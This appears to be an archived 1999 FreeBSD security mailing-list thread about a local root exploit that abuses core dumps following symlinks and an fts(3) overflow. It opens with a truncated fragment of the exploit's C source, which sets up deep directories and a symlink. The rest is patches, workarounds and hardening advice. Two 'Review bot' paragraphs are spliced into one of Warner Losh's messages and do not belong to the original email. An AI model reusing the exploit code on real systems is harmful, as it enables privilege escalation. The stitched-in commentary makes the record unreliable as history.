int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{

    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
        return -1;

    if (chdir(dir))
        return -1;

    if (symlink(linkfrom, linkto) < 0)
        return -1;

    return 0;
}

int main(argc, argv)
int argc;
char **argv;
{
    int i = 0;
    char pid[10], buf[BUFSIZE];

    sprintf(pid, "%d", getpid());

    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
    {
        perror("mkdir()");
        return -1;
    }

    if (chdir(pid))
    {
        perror("chdir()");
        return -1;
    }

    bzero(buf, BUFSIZE);
    memset(buf, 0x41, BUFSIZE-1);

    for(i=0;i

To: Gregory Sutter
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Cc: security-officer@freebsd.org, freebsd-security@freebsd.org
In-reply-to: Your message of "Thu, 26 Aug 1999 09:49:10 PDT." <19990826094910.F20512@forty-two.egroups.net>
References: <19990826094910.F20512@forty-two.egroups.net>
Date: Thu, 26 Aug 1999 11:04:07 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes:
: This claims to describe a FreeBSD root exploit, and was just posted
: to BugTraq.

Thanks. They said they weren't going to post this for a few more days... Grump.
Warner

From owner-freebsd-security Thu Aug 26 10:17:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id D4F4814C04 for ; Thu, 26 Aug 1999 10:17:14 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr)
Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id TAA02931 for freebsd-security@FreeBSD.ORG; Thu, 26 Aug 1999 19:13:55 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr)
Received: by keltia.freenix.fr (Postfix, from userid 101) id DDA84870A; Thu, 26 Aug 1999 08:21:21 +0200 (CEST)
Date: Thu, 26 Aug 1999 08:21:21 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: undelete
Message-ID: <19990826082121.A53241@keltia.freenix.fr>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <99Aug26.113851est.40335@border.alcanet.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
User-Agent: Mutt/0.95.5i
In-Reply-To: ; from David Scheidt on Wed, Aug 25, 1999 at 10:06:15PM -0500
X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to David Scheidt:
> What, exactly, is broken with LFS? Or, at least, when did it get broken?

Apart from the fact that it was never finished, it didn't survive the unified VM/buffer cache that went in just after FreeBSD 2.0 in '95.

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999

From owner-freebsd-security Thu Aug 26 10:32:20 1999
Message-Id: <199908261733.LAA65999@harmony.village.org>
To: Mike Tancsa
Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999)
Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
In-reply-to: Your message of "Thu, 26 Aug 1999 12:55:00 EDT." <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca>
Date: Thu, 26 Aug 1999 11:33:30 -0600
From: Warner Losh

The quick and dirty workaround for this would be to move
/usr/sbin/periodic to /usr/sbin/periodic.bin.  Replace /usr/sbin/periodic
with

#!/bin/sh
limits -c 0
/usr/sbin/periodic.bin $*

Both the bug in the fts library and the dumping to core dumps through
symbolic links which together conspire to have this bug are being fixed
and there should be real commits soon.
Warner

From owner-freebsd-security Thu Aug 26 10:39:23 1999
Message-Id: <199908261738.KAA94664@burka.rdy.com>
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
In-Reply-To: <199908261704.LAA65785@harmony.village.org> from Warner Losh at "Aug 26, 1999 11:04:07 am"
To: imp@village.org (Warner Losh)
Date: Thu, 26 Aug 1999 10:38:51 -0700 (PDT)
Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org
From: dima@best.net (Dima Ruban)

Warner Losh writes:
> In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes:
> : This claims to describe a FreeBSD root exploit, and was just posted
> : to BugTraq.
> 
> Thanks.  They said they weren't going to post this for a few more
> days...  Grump.

:-/

I've just committed a fix.
> 
> Warner
> 

-- dima

From owner-freebsd-security Thu Aug 26 10:44: 6 1999
Message-Id: <199908261744.LAA66156@harmony.village.org>
To: dima@best.net
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org
In-reply-to: Your message of "Thu, 26 Aug 1999 10:38:51 PDT." <199908261738.KAA94664@burka.rdy.com>
Date: Thu, 26 Aug 1999 11:44:52 -0600
From: Warner Losh

In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes:
: I've just committed a fix.

Thanks Dima.  It was first thing on my list after catching up on my
email.  Wanna write the advisory?  Or at least give me verified patch
files?
Warner

From owner-freebsd-security Thu Aug 26 11: 4:31 1999
Date: Thu, 26 Aug 1999 11:03:01 -0700
From: Matthew Hunt
To: Warner Losh
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999)
Message-ID: <19990826110301.A3048@wopr.caltech.edu>
In-Reply-To: <199908261733.LAA65999@harmony.village.org>; from Warner Losh on Thu, Aug 26, 1999 at 11:33:30AM -0600

On Thu, Aug 26, 1999 at 11:33:30AM -0600, Warner Losh wrote:

> #!/bin/sh
> limits -c 0
> /usr/sbin/periodic.bin $*

I believe "limits" should read "ulimit".  "limits" is /usr/bin/limits,
and "ulimit" is the /bin/sh builtin.
wopr:~$ cat blah
#!/bin/sh
limits -c 0
limits
ulimit -c 0
limits
wopr:~$ ./blah
Resource limits (current):
  coredumpsize           0 kb
Resource limits (current):
  cputime          infinity secs
  filesize         infinity kb
  datasize           524288 kb
  stacksize           65536 kb
  coredumpsize     infinity kb
  memoryuse        infinity kb
  memorylocked     infinity kb
  maxprocesses          128
  openfiles             128
Resource limits (current):
  cputime          infinity secs
  filesize         infinity kb
  datasize           524288 kb
  stacksize           65536 kb
  coredumpsize            0 kb
  memoryuse        infinity kb
  memorylocked     infinity kb
  maxprocesses          128
  openfiles             128
wopr:~$ uname -a
FreeBSD wopr.caltech.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #8: Thu Aug 26 09:13:16 PDT 1999     mph@wopr.caltech.edu:/a/src/sys/compile/WOPR  i386

(Sources about 2 days old.)

-- 
Matthew Hunt * Stay close to the Vorlon.
http://www.pobox.com/~mph/ *

From owner-freebsd-security Thu Aug 26 11: 4:35 1999
Message-Id: <199908261758.KAA94925@burka.rdy.com>
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?)
 local root explot]
In-Reply-To: <199908261744.LAA66156@harmony.village.org> from Warner Losh at "Aug 26, 1999 11:44:52 am"
To: imp@village.org (Warner Losh)
Date: Thu, 26 Aug 1999 10:58:45 -0700 (PDT)
Cc: dima@best.net, gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org
From: dima@best.net (Dima Ruban)

Warner Losh writes:
> In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes:
> : I've just committed a fix.
> 
> Thanks Dima.  It was first thing on my list after catching up on my
> email.  Wanna write the advisory?  Or at least give me verified patch

I'm not very good at writing advisories :-)

> files?
> 
> Warner
> 

-- dima

For -current:

*** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 --- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 *************** *** 722,729 **** if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 722,729 ---- if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); *** kern/imgact_aout.c 1999/05/17 00:53:36 1.52 --- kern/imgact_aout.c 1999/08/26 17:32:48 1.53 *************** *** 264,271 **** name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); !
error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 264,271 ---- name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); ----------cut here For 3.x-stable: *** kern/imgact_elf.c 1999/07/15 13:01:54 1.44.2.4 --- kern/imgact_elf.c 1999/08/26 17:35:03 1.44.2.5 *************** *** 699,706 **** if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 699,706 ---- if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); *** kern/imgact_aout.c 1999/04/14 04:55:22 1.44.2.1 --- kern/imgact_aout.c 1999/08/26 17:35:02 1.44.2.2 *************** *** 259,266 **** name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 259,266 ---- name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! 
error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error);

From owner-freebsd-security Thu Aug 26 11: 5:41 1999
Message-Id: <199908261806.MAA66446@harmony.village.org>
To: Matthew Hunt
Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999)
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
In-reply-to: Your message of "Thu, 26 Aug 1999 11:03:01 PDT." <19990826110301.A3048@wopr.caltech.edu>
Date: Thu, 26 Aug 1999 12:06:36 -0600
From: Warner Losh

In message <19990826110301.A3048@wopr.caltech.edu> Matthew Hunt writes:
: On Thu, Aug 26, 1999 at 11:33:30AM -0600, Warner Losh wrote:
: 
: > #!/bin/sh
: > limits -c 0
: > /usr/sbin/periodic.bin $*
: 
: I believe "limits" should read "ulimit".  "limits" is /usr/bin/limits,
: and "ulimit" is the /bin/sh builtin.
: 
: wopr:~$ cat blah
: #!/bin/sh
: limits -c 0
: limits
: ulimit -c 0
: limits

I do believe that you are right.
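Review bot: in all four hunks of Dima Ruban's patch above (imgact_elf.c 722,729 and 699,706; imgact_aout.c 264,271 and 259,266) the symlink refusal is expressed twice, as NOFOLLOW in the NDINIT() flags and as O_NOFOLLOW in the vn_open() mode. If vn_open() rebuilds the namei flags from its mode argument, the NDINIT() change is the cosmetic half; a one-line comment above the vn_open() call saying which flag is relied on would stop a later cleanup from dropping the effective one. The commit message should also spell out that the new mode is O_CREAT | FWRITE | O_NOFOLLOW without O_EXCL: a pre-existing regular file at the core path is still opened and written to, which is the behaviour Ben Gras's sysctl proposal later in this thread (O_CREAT | O_EXCL) would tighten.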
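Review bot: only the ELF and a.out coredump paths are changed in the patch above, and the commit message does not say whether any other place in the kernel opens a core file for writing; a sentence confirming that imgact_elf.c and imgact_aout.c are the only two (Ben Gras notes later in the thread that the Linux emulation shares them and that there is no COFF coredump routine) would let the advisory state the fix's coverage. A regression test belongs with it as well: put a symlink where the core file would be written and check that the dump now fails with an error instead of following the link.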
That's what I get for whipping out a test case w/o testing it
completely...

Warner

From owner-freebsd-security Thu Aug 26 11:11:21 1999
Message-Id: <199908261810.MAA66492@harmony.village.org>
To: dima@best.net
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org
In-reply-to: Your message of "Thu, 26 Aug 1999 10:58:45 PDT." <199908261758.KAA94925@burka.rdy.com>
Date: Thu, 26 Aug 1999 12:10:32 -0600
From: Warner Losh

In message <199908261758.KAA94925@burka.rdy.com> Dima Ruban writes:
: I'm not very good at writing advisories :-)

OK.  I'll write this up then.  The verified patch files help a whole lot.
Warner

From owner-freebsd-security Thu Aug 26 11:31: 0 1999
Date: Thu, 26 Aug 1999 12:28:44 -0600 (MDT)
From: Paul Hart
To: Warner Losh
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD (and other BSDs?) local root explot]
In-Reply-To: <199908261810.MAA66492@harmony.village.org>

On Thu, 26 Aug 1999, Warner Losh wrote:

> The verified patch files help a whole lot.

Has anyone investigated patches to the fts(3) functions in libc?  We've
seen kernel patches (to stop following symbolic links when dumping core?)
but it would be nice to fix the fts(3) bugs as well that started all of
this.

Paul Hart

-- 
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Thu Aug 26 11:46:56 1999
Message-Id: <199908261846.MAA66821@harmony.village.org>
To: Paul Hart
Subject: Re: FreeBSD (and other BSDs?) local root explot]
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 26 Aug 1999 12:28:44 MDT."
Date: Thu, 26 Aug 1999 12:46:25 -0600
From: Warner Losh

In message Paul Hart writes:
: Has anyone investigated patches to the fts(3) functions in libc?  We've
: seen kernel patches (to stop following symbolic links when dumping core?)
: but it would be nice to fix the fts(3) bugs as well that started all of
: this.

Bruce has done that.  He's trying to get them to the point he's happy
with them and track down all the implied POSIX issues that might result
from changing fts.  I will admit that I've been slow in the past to
review some of the changes he wanted to make to fix this problem, mostly
due to heavy work loads at the time.  In the past few days several
patches to different areas of the system have been flooding through my
mailbox for review on this problem.  This is both good and bad.

This exploit pointed out several bugs.
periodic shouldn't allow its children to dump core (since you don't want
new core files in your dump every day), core dumps *MUST*NOT* follow
symbolic links (which they didn't do in 2.x, but there was some back
sliding in 3.x and 4.x in this area), fts has an overflow which can cause
problems in large, wide trees.  Had any one of these been different, the
problem would not have happened.  There are also some downstream issues
with many programs not doing proper error checking (eg, if ssh sees
bogons in its authorized_keys file, it should abort not ignore them), but
that doesn't solve the "file assassination" problems, it merely works
around them.

I'm working on some administrivia right now to get the advisories to
happen properly...

Warner

From owner-freebsd-security Thu Aug 26 11:53:33 1999
Date: Thu, 26 Aug 1999 20:51:24 +0200
From: Ben Gras
To: freebsd-security@freebsd.org
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?)
 local root explot]
Message-ID: <19990826205124.A3588@euronet.nl>
In-Reply-To: <199908261704.LAA65785@harmony.village.org>; from Warner Losh on Thu, Aug 26, 1999 at 11:04:07AM -0600

All,

On Thu, Aug 26, 1999 at 11:04:07AM -0600, Warner Losh wrote:
> In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes:
> : This claims to describe a FreeBSD root exploit, and was just posted
> : to BugTraq.
> Thanks.  They said they weren't going to post this for a few more
> days...  Grump.

First of all: a fix for this (AFAICS), and good practice regardless, is
to set kern.corefile to something where this kind of fiddling can't
happen.  A nice example is a variation of what's in the source:
/var/cores/%U/%N-%P.  This could be done along with a

# mkdir -m 755 /var/cores
# cd /var/cores && \
  for i in `awk -F: '{ print $3 }' /etc/passwd`
  do
      mkdir -m 700 $i && chown $i $i || echo $i failed
  done

and a hook in adduser/rmuser perhaps.  The above should be done for every
possible root, i.e., also for e.g. chrooted ftpd and httpd.

/var/cores is used instead of /cores because you don't want users to be
able to write on /, and /var/tmp is often user-writable anyway (as
always, tune to meet local needs).  If you want cores to work if /var
isn't mounted, create a /var/cores on / and do the above there too (it
might be useful one day).

This provides a lot more security against core files lying around, or,
in this case, being dumped where they shouldn't be, and eliminates this
class of weakness.

I'll mail my patch for sysctls for cores-are-created-when-written-at-all
(a la O_CREAT | O_EXCL) and symlinks-aren't-followed-on-cores on 3.2-R
to Warner.
Unfortunately this had to be (well, without further kludging) hard-wired
into the various core dumping functions (elf, aout; fortunately the linux
code shares these functions and there's no COFF coredumping function).

Regards,

=Ben

From owner-freebsd-security Thu Aug 26 13:58:58 1999
Message-Id: <199908262056.NAA03100@implode.root.com>
To: dima@best.net
Cc: imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
In-reply-to: Your message of "Thu, 26 Aug 1999 10:58:45 PDT." <199908261758.KAA94925@burka.rdy.com>
From: David Greenman
Date: Thu, 26 Aug 1999 13:56:29 -0700

   Yikes, you're not proposing that we disable following of symlinks that
point to binaries, are you?

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org
Creator of high-performance Internet servers - http://www.terasolutions.com
Pave the road of life with opportunities.

>Warner Losh writes:
>> In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes:
>> : I've just committed a fix.
>> 
>> Thanks Dima.  It was first thing on my list after catching up on my
>> email.  Wanna write the advisory?  Or at least give me verified patch
>
>I'm not very good at writing advisories :-)
>
>> files?
>> >> Warner >> > >-- dima > >For -current: > >*** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 >--- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 >*************** >*** 722,729 **** > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 722,729 ---- > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >*** kern/imgact_aout.c 1999/05/17 00:53:36 1.52 >--- kern/imgact_aout.c 1999/08/26 17:32:48 1.53 >*************** >*** 264,271 **** > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 264,271 ---- > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >----------cut here > >For 3.x-stable: > >*** kern/imgact_elf.c 1999/07/15 13:01:54 1.44.2.4 >--- kern/imgact_elf.c 1999/08/26 17:35:03 1.44.2.5 >*************** >*** 699,706 **** > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 699,706 ---- > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ > >! 
NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >*** kern/imgact_aout.c 1999/04/14 04:55:22 1.44.2.1 >--- kern/imgact_aout.c 1999/08/26 17:35:02 1.44.2.2 >*************** >*** 259,266 **** > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error); >--- 259,266 ---- > name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); > if (name == NULL) > return (EFAULT); /* XXX -- not the best error */ >! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); >! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); > free(name, M_TEMP); > if (error) > return (error);

From owner-freebsd-security Thu Aug 26 14: 7:41 1999
Message-Id: <199908262104.OAA97706@burka.rdy.com>
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?)
 local root explot]
In-Reply-To: <199908262056.NAA03100@implode.root.com> from David Greenman at "Aug 26, 1999 01:56:29 pm"
To: dg@root.com
Date: Thu, 26 Aug 1999 14:04:42 -0700 (PDT)
Cc: dima@best.net, imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
From: dima@best.net (Dima Ruban)

David Greenman writes:
>    Yikes, you're not proposing that we disable following of symlinks that
> point to binaries, are you?

I'm sorry?  I'm not sure I've got your question ...  What binaries?
This patch prevents coredumps from following symlinks, that's it.  Or is
there a side effect?

> 
> -DG
> 

-- dima

From owner-freebsd-security Thu Aug 26 14:16:55 1999
Message-Id: <199908262116.OAA03219@implode.root.com>
To: dima@best.net, imp@village.org (Warner Losh), gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
In-reply-to: Your message of "Thu, 26 Aug 1999 13:56:29 PDT."
 <199908262056.NAA03100@implode.root.com>
From: David Greenman
Date: Thu, 26 Aug 1999 14:16:17 -0700

>   Yikes, you're not proposing that we disable following of symlinks that
>point to binaries, are you?

   Ah, never mind, there wasn't enough context in those context diffs.  I
see now that this only affects core files that are created.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org
Creator of high-performance Internet servers - http://www.terasolutions.com
Pave the road of life with opportunities.

From owner-freebsd-security Thu Aug 26 15:11:59 1999
Message-Id: <199908262213.QAA68314@harmony.village.org>
To: dg@root.com
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Cc: dima@best.net, gsutter@pobox.com (Gregory Sutter), security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 26 Aug 1999 13:56:29 PDT."
 <199908262056.NAA03100@implode.root.com>
Date: Thu, 26 Aug 1999 16:13:09 -0600
From: Warner Losh

In message <199908262056.NAA03100@implode.root.com> David Greenman writes:
:    Yikes, you're not proposing that we disable following of symlinks that
: point to binaries, are you?

No.  Just following symlinks when dumping core.

Warner

From owner-freebsd-security Thu Aug 26 16:34:36 1999
Date: Thu, 26 Aug 1999 19:25:33 -0400 (EDT)
From: Barrett Richardson
To: Warner Losh
Cc: dg@root.com, dima@best.net, Gregory Sutter, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
In-Reply-To: <199908262213.QAA68314@harmony.village.org>

On Thu, 26 Aug 1999, Warner Losh wrote:

> In message <199908262056.NAA03100@implode.root.com> David Greenman writes:
> : Yikes, you're not proposing that we disable following of symlinks that
> : point to binaries, are you?
> 
> No.  Just following symlinks when dumping core.
> 
> Warner
> 

On Digital Unix where core dumps are a big problem with setuid
binaries and the symlink issue, core dumps are disabled on
binaries that do not have a read bit set.
This offers an "on the fly" workaround. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 16:47: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from zone.unixshell.com (zone.syracuse.net [209.2.141.6]) by hub.freebsd.org (Postfix) with ESMTP id 1B0D51542D for ; Thu, 26 Aug 1999 16:46:57 -0700 (PDT) (envelope-from mayres@zone.unixshell.com) Received: from localhost (mayres@localhost) by zone.unixshell.com (8.9.3/8.9.3) with ESMTP id TAA77583 for ; Thu, 26 Aug 1999 19:44:59 -0400 (EDT) (envelope-from mayres@zone.unixshell.com) Date: Thu, 26 Aug 1999 19:44:58 -0400 (EDT) From: Matt Ayres To: freebsd-security@FreeBSD.ORG Subject: subscribe Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 16:47:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 910AA15DB5; Thu, 26 Aug 1999 16:47:30 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id RAA86777; Thu, 26 Aug 1999 17:47:10 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA69353; Thu, 26 Aug 1999 17:48:29 -0600 (MDT) Message-Id: <199908262348.RAA69353@harmony.village.org> To: Barrett Richardson Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) 
local root explot] Cc: dg@root.com, dima@best.net, Gregory Sutter , security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 19:25:33 EDT." References: Date: Thu, 26 Aug 1999 17:48:28 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Barrett Richardson writes: : On Digital Unix where core dumps are a big problem with setuid : binaries and the symlink issue, core dumps are disabled on : binaries that do not have a read bit set. This offers an "on : the fly" workaround. Setuid binaries already don't dump core. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 17: 6:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id F3E7215DE4 for ; Thu, 26 Aug 1999 17:05:39 -0700 (PDT) (envelope-from barrett@phoenix.aye.net) Received: (qmail 24232 invoked by uid 1000); 26 Aug 1999 23:57:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Aug 1999 23:57:28 -0000 Date: Thu, 26 Aug 1999 19:57:28 -0400 (EDT) From: Barrett Richardson To: Warner Losh Cc: dg@root.com, dima@best.net, Gregory Sutter , security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908262348.RAA69353@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Warner Losh wrote: > In message Barrett Richardson writes: > : On Digital Unix where core dumps are a big problem with setuid > : binaries and the symlink issue, core dumps are disabled on > : binaries that do not have a read bit set. 
